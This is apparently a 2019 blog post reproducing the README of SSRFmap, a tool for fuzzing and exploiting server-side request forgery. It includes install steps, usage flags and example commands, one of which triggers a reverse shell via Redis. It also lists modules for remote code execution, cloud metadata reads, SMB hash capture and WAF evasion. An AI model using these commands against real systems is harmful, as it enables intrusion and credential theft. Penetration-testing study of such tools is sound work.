SSRFmap – Automatic SSRF Fuzzer And Exploitation Tool

February 21, 2019 haxf4rall2017 automatic fuzzer, how to use ssrfmap, SSRFmap

SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.

SSRFmap – Automatic SSRF Fuzzer And Exploitation Tool Guide / RTFM

Basic install from the Github repository.

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                  [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
                  [--ssl [SSL]] [--level [LEVEL]]

optional arguments:
  -h, --help          show this help message and exit
  -r REQFILE          SSRF Request file
  -p PARAM            SSRF Parameter to target
  -m MODULES          SSRF Modules to enable
  -l HANDLER          Start an handler for a reverse shell
  --lhost LHOST       LHOST reverse shell
  --lport LPORT       LPORT reverse shell
  --uagent USERAGENT  User Agent to use
  --ssl [SSL]         Use HTTPS without verification
  --level [LEVEL]     Level of test to perform (1-5, default: 1)

The default way to use this script is the following.

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

A quick way to test the framework can be done with data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules

The following modules are already implemented and can be used with the -m argument.

Name	Description
`fastcgi`	FastCGI RCE
`redis`	Redis RCE
`github`	Github Enterprise RCE < 2.8.7
`zabbix`	Zabbix RCE
`mysql`	MySQL Command execution
`docker`	Docker Infoleaks via API
`smtp`	SMTP send mail
`portscan`	Scan ports for the host
`networkscan`	HTTP Ping sweep over the network
`readfiles`	Read files such as `/etc/passwd`
`alibaba`	Read files from the provider (e.g: meta-data, user-data)
`aws`	Read files from the provider (e.g: meta-data, user-data)
`gce`	Read files from the provider (e.g: meta-data, user-data)
`digitalocean`	Read files from the provider (e.g: meta-data, user-data)
`socksproxy`	SOCKS4 Proxy
`smbhash`	Force an SMB authentication via a UNC Path
`tomcat`	Bruteforce attack against Tomcat Manager